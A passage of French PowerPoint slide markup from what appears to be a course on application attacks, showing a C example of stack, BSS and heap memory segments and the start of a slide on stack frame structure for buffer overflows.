                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a = 2; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// variable locale: dans la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>float</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> b = 2.5; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// variable locale: dans la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// variable statique: dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// Allocation de la mémoire dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(2*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">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n-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// les valeurs 5 et 6 sont stockées dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[0] = 5; // dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">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fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[1] = 6; // dans le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">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fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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089589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attaques applicatives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="657547"/>
            <a:ext cx="9805416" cy="769666"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow : Structure de la Stack (les frames)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123289" y="2044723"/>
            <a:ext cx="4695291" cy="17196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07000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" dirty="0">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s-ES" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
